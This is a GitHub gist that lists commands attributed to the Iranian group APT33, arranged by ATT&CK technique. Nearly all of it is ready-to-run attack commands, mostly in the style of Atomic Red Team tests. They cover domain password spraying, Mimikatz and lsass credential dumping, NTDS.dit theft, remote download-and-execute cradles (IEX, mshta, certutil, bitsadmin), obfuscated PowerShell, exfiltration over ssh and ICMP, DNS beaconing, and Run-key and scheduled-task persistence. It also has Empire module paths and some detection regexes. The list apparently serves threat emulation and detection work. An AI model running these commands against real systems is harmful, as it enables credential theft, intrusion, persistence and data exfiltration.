Skip to content

Instantly share code, notes, and snippets.

@MSAdministrator

MSAdministrator/iranian_apit_groups_possible_commands.md

Last active March 18, 2026 19:25
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save MSAdministrator/7a61025263e279a740835da4b205e6d0 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save MSAdministrator/7a61025263e279a740835da4b205e6d0 to your computer and use it in GitHub Desktop.
Download ZIP
Iranian APT Groups & Possible Commands Used By These Groups
Raw
apt33_apt34_possible_commands.md

Actor: APT33

Technique Name: Brute Force

Technique Commands

net user /domain > DomainUsers.txt
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL

net user /domain > DomainUsers.txt
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:YOUR_COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL

net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL

net user /domain > #{input_file_users}
echo "Password1" >> passwords.txt
echo "1q2w3e4r" >> passwords.txt
echo "Password!" >> passwords.txt
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL

    powershell/recon/get_sql_server_login_default_pw
    powershell/recon/get_sql_server_login_default_pw
    powershell/recon/http_login
    powershell/recon/http_login
    powershell/situational_awareness/network/smbautobrute
    powershell/situational_awareness/network/smbautobrute
    powershell/situational_awareness/network/smbscanner
    powershell/situational_awareness/network/smbscanner
    Shell
    
root @ icbc: / hacker / mima # hydra -l root -P passwd.txt ssh: //192.168.159.132 -V
Hydra v9.0 (c) 2019 by van Hauser / THC - Please do not use in military or secret service organizations, or for illegal purposes.
        auth.log
        Log
Failed password for root from 192.168.159.129 port 43728 ssh2
        audit.log
        Log
type = USER_AUTH msg = audit (1572163129.581: 316): pid = 2165 uid = 0 auid = 4294967295 ses = 4294967295 msg = 'op = PAM: authentication acct = "root" exe = "/ usr / sbin / sshd" hostname = 192.168 .159.129 addr = 192.168.159.129 terminal = ssh res = failed '

Actor: APT33

Technique Name: Commonly Used Port

Technique Commands

!=powershell.exe
nslookup
!=cmd.exe
nslookup
powershell/lateral_movement/invoke_sshcommand
powershell/lateral_movement/invoke_sshcommand

Actor: APT33

Technique Name: Credential Dumping

Technique Commands

hashdump
mimikatz !lsadump::sam

hashdump
run hashdump
run smart_hashdump
post/windows/gather/credentials/domain_hashdump

logonpasswords
mimikatz !sekurlsa::logonpasswords
mimikatz !sekurlsa::msv
mimikatz !sekurlsa::kerberos
mimikatz !sekurlsa::wdigest

use mimikatz
wdigest
msv
kerberos
logonpasswords

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

gsecdump -a

wce -o output.txt

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security

procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp

ntdsutil "ac i ntds" "ifm" "create full C:\Atomic_Red_Team" q q

vssadmin.exe create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE

findstr /S cpassword %logonserver%\sysvol\*.xml

. $PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
Get-GPPPassword -Verbose

ntdsutil.exe
\\Windows\\.+\\lsass.exeHKLM\SAM|HKLM\Security
\\Windows\\.+\\bcryptprimitives.dll|\\Windows\\.+\\bcrypt.dll|\\Windows\\.+\\ncrypt.dll
powershell/collection/ChromeDump
powershell/collection/ChromeDump
powershell/collection/FoxDump
powershell/collection/FoxDump
powershell/collection/ninjacopy
powershell/collection/ninjacopy
powershell/collection/vaults/add_keepass_config_trigger
powershell/collection/vaults/add_keepass_config_trigger
powershell/collection/vaults/find_keepass_config
powershell/collection/vaults/find_keepass_config
powershell/collection/vaults/get_keepass_config_trigger
powershell/collection/vaults/get_keepass_config_trigger
powershell/collection/vaults/keethief
powershell/collection/vaults/keethief
powershell/collection/vaults/remove_keepass_config_trigger
powershell/collection/vaults/remove_keepass_config_trigger
powershell/credentials/enum_cred_store
powershell/credentials/enum_cred_store
powershell/credentials/mimikatz/cache
powershell/credentials/mimikatz/cache
powershell/credentials/mimikatz/command
powershell/credentials/mimikatz/command
powershell/credentials/mimikatz/dcsync
powershell/credentials/mimikatz/dcsync
powershell/credentials/mimikatz/dcsync_hashdump
powershell/credentials/mimikatz/dcsync_hashdump
powershell/credentials/mimikatz/extract_tickets
powershell/credentials/mimikatz/extract_tickets
powershell/credentials/mimikatz/golden_ticket
powershell/credentials/mimikatz/golden_ticket
powershell/credentials/mimikatz/logonpasswords
powershell/credentials/mimikatz/logonpasswords
powershell/credentials/mimikatz/lsadump
powershell/credentials/mimikatz/lsadump
powershell/credentials/mimikatz/mimitokens
powershell/credentials/mimikatz/mimitokens
powershell/credentials/mimikatz/sam
powershell/credentials/mimikatz/sam
powershell/credentials/mimikatz/silver_ticket
powershell/credentials/mimikatz/silver_ticket
powershell/credentials/mimikatz/trust_keys
powershell/credentials/mimikatz/trust_keys
powershell/credentials/powerdump
powershell/credentials/powerdump
powershell/credentials/vault_credential
powershell/credentials/vault_credential
powershell/management/downgrade_account
powershell/management/downgrade_account
powershell/management/wdigest_downgrade
powershell/management/wdigest_downgrade
powershell/privesc/gpp
powershell/privesc/gpp
powershell/privesc/mcafee_sitelist
powershell/privesc/mcafee_sitelist
python/collection/linux/hashdump
python/collection/linux/hashdump
python/collection/linux/mimipenguin
python/collection/linux/mimipenguin
python/collection/osx/hashdump
python/collection/osx/hashdump
python/collection/osx/kerberosdump
python/collection/osx/kerberosdump
python/management/multi/kerberos_inject
python/management/multi/kerberos_inject
python/situational_awareness/network/dcos/etcd_crawler
python/situational_awareness/network/dcos/etcd_crawler

Actor: APT33

Technique Name: Data Compressed

Technique Commands

dir #{input_file} -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip

dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip

rar a -r #{output_file} #{input_path} *.txt

rar a -r %USERPROFILE%\data.rar #{input_path} *.txt

rar a -r #{output_file} %USERPROFILE% *#{file_extension}

zip $HOME/data.zip #{input_files}

zip $HOME/data.zip $HOME/*.txt

test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo '#{input_content}' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)

test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)

tar -cvzf $HOME/data.tar.gz #{input_file_folder}

tar -cvzf $HOME/data.tar.gz $HOME/$USERNAME

rar.exe
powershell/management/zipfolder
powershell/management/zipfolder

Actor: APT33

Technique Name: Data Encoding

Technique Commands

echo -n 111-11-1111 | base64
curl -XPOST MTExLTExLTExMTE=.#{destination_url}

echo -n 111-11-1111 | base64
curl -XPOST MTExLTExLTExMTE=.redcanary.com

Actor: APT33

Technique Name: Exfiltration Over Alternative Protocol

Technique Commands

ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'

tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'

tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh atomic@#{domain} 'cat > /Users.tar.gz.enc'

$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }

$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\Windows\System32\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }

powershell/exfiltration/exfil_dropbox
powershell/exfiltration/exfil_dropbox
exfiltration/Invoke_ExfilDataToGitHub
exfiltration/Invoke_ExfilDataToGitHub

Actor: APT33

Technique Name: Exploitation for Privilege Escalation

Technique Commands

getsystem
getsystem
bitsadmin.exe
msbuild.exe *MSBuildShell.csproj
powershell/privesc/ms16-032
powershell/privesc/ms16-032
powershell/privesc/tater
powershell/privesc/tater
powershell/privesc/ms16-135
powershell/privesc/ms16-135

Actor: APT33

Technique Name: Network Sniffing

Technique Commands

tcpdump -c 5 -nnni ens33
tshark -c 5 -i ens33

tcpdump -c 5 -nnni en0A
tshark -c 5 -i en0A

"c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
c:\windump.exe

& "c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
& c:\windump.exe

powershell/collection/packet_capture
powershell/collection/packet_capture
python/collection/linux/sniffer
python/collection/linux/sniffer
python/collection/osx/sniffer
python/collection/osx/sniffer

Actor: APT33

Technique Name: Obfuscated Files or Information

Technique Commands

sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh

$OriginalCommand = 'Write-Host "Hey, Atomic!"'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

powershell.exe -EncodedCommand $EncodedCommand

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"

$OriginalCommand = 'Write-Host "Hey, Atomic!"'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\Microsoft\Windows\CurrentVersion #{registry_entry_storage}).#{registry_entry_storage})))"

[a-z0-9]{1}.exe
*.exe \*.exe\:Zone.Identifier:$DATA"

Actor: APT33

Technique Name: PowerShell

Technique Commands

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"

(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))

$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"

New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password ATOM1CR3DT3@M -Description '#{description}'

New-LocalUser -FullName '#{full_name}' -Name 'atomic_user' -Password ATOM1CR3DT3@M -Description '#{description}'

New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'

New-LocalUser -FullName 'Atomic Red Team' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'

powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml');$Xml.command.a.execute | IEX"

"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct').Exec();close()"

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

powershell.exe -version 2 -Command Write-Host $PSVersion

Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'
Invoke-Expression $streamcommand

excel.exe
cmd.exe
powershell.exe
excel.exe
powershell.exe
mshta.exe
cmd.exe
powershell.exe
mshta.exe
powershell.exe
powerpoint.exe
cmd.exe
powershell.exe
powerpoint.exe
powershell.exe
powershell.exe webClient.DownloadString(
powershell.exe webClient.DownloadFile
powershell.exe webClient.DownloadData
winword.exe
powershell.exe
hidden|-enc|-NonI\\Windows\\.+\\WindowsPowerShell\\.+\\powershell.exe
powershell/lateral_movement/invoke_psremoting
powershell/lateral_movement/invoke_psremoting
powershell/management/spawn
powershell/management/spawn
python/management/multi/spawn
python/management/multi/spawn

Actor: APT33

Technique Name: Registry Run Keys / Startup Folder

Technique Commands

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"

REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"

$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'

Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\Microsoft\Windows\Start Menu\Programs\Startup|Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Microsoft\Windows\Start Menu\Programs\Startup
\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft\Windows\Start Menu\Programs\Startup
powershell/persistence/elevated/registry
powershell/persistence/elevated/registry
powershell/persistence/userland/registry
powershell/persistence/userland/registry

Actor: APT33

Technique Name: Remote File Copy

Technique Commands

rsync -r #{local_path} victim@#{remote_host}:#{remote_path}

rsync -r /tmp/adversary-rsync/ victim@#{remote_host}:#{remote_path}

rsync -r #{local_path} #{username}@victim-host:#{remote_path}

rsync -r #{local_path} #{username}@victim-host:/tmp/victim-files

rsync -r adversary@#{remote_host}:#{remote_path} #{local_path}

rsync -r adversary@#{remote_host}:#{remote_path} /tmp/victim-files

rsync -r #{username}@adversary-host:#{remote_path} #{local_path}

rsync -r #{username}@adversary-host:/tmp/adversary-rsync/ #{local_path}

scp #{local_file} victim@#{remote_host}:#{remote_path}

scp /tmp/adversary-scp victim@#{remote_host}:#{remote_path}

scp #{local_file} #{username}@victim-host:#{remote_path}

scp #{local_file} #{username}@victim-host:/tmp/victim-files/

scp adversary@#{remote_host}:#{remote_file} #{local_path}

scp adversary@#{remote_host}:/tmp/adversary-scp #{local_path}

scp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/

scp #{username}@adversary-host:#{remote_file} /tmp/victim-files/

sftp victim@#{remote_host}:#{remote_path} <<< $'put #{local_file}'

sftp victim@#{remote_host}:#{remote_path} <<< $'put /tmp/adversary-sftp'

sftp #{username}@victim-host:#{remote_path} <<< $'put #{local_file}'

sftp #{username}@victim-host:/tmp/victim-files/ <<< $'put #{local_file}'

sftp adversary@#{remote_host}:#{remote_file} #{local_path}

sftp adversary@#{remote_host}:/tmp/adversary-sftp #{local_path}

sftp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/

sftp #{username}@adversary-host:#{remote_file} /tmp/victim-files/

cmd /c certutil -urlcache -split -f #{remote_file} Atomic-license.txt

cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt

$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }

$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }

C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} #{local_path}

C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} Atomic-license.txt

C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}

(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "Atomic-license.txt")
(New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", "Atomic-license.txt")

Actor: APT33

Technique Name: Scheduled Task

Technique Commands

  schtasks [/s HOSTNAME]
  shell schtasks
  Creating a scheduled task:
schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
Requirements for running scheduled tasks:
net start schedule
sc config schedule start= auto
  Creating a scheduled task:
shell schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
Requirements for running scheduled tasks:
shell net start schedule
shell sc config schedule start= auto
  at 13:20 /interactive cmd

  SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST #{time}

  SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}

  SCHTASKS /Create /S #{target} /RU #{user_name} /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}

  SCHTASKS /Create /S #{target} /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}

  SCHTASKS /Create /S localhost /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}

  $Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object

  schtask.exe /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
  schtask.exe /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"
  at.exe ##:## /interactive cmd
  at.exe \\[computername|IP] ##:## c:\temp\evil.bat
  net.exe use \\[computername|IP] /user:DOMAIN\username password
  net.exe time \\[computername|IP]
  schtasks.exe /create * appdata
  \\Windows\\.+\\at.exe
  /Create\\Windows\\.+\\schtasks.exe
  powershell/lateral_movement/new_gpo_immediate_task
  powershell/lateral_movement/new_gpo_immediate_task
  powershell/persistence/elevated/schtasks
  powershell/persistence/elevated/schtasks
  powershell/persistence/userland/schtasks
  powershell/persistence/userland/schtasks

Actor: APT33

Technique Name: Standard Application Layer Protocol

Technique Commands

Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null

curl -s -A "HttpBrowser/1.0" -m3 www.google.com
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
curl -s -A "*<|>*" -m3 www.google.com

curl -s -A "HttpBrowser/1.0" -m3 www.google.com
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
curl -s -A "*<|>*" -m3 www.google.com

for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}

for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).example.com" -QuickTimeout}

for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}

Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}

Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}

Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}

Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT

Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType TXT

Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}

Actor: APT33

Technique Name: Uncommonly Used Port

